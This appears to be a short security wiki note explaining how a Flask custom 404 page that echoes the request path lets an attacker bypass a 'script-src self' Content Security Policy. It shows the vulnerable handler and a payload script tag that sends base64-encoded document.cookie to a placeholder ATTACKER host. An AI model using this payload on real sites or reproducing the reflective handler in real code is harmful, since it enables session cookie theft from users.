====== Bypass CSP when a custom 404 page is present ======

With:
<code python>
resp.headers['Content-Security-Policy'] = "script-src 'self';
</code>

And a custom 404 page like:

<code python>
@app.errorhandler(404)
def page_not_found(error):
    path = request.path
    return f"{path} not found"
</code>

It's possible to reflect JS in the same origin.

E.g.

<code>

<script src='ab.c/;fetch(`ATTACKER/${btoa(document.cookie)}`) //'>
</code>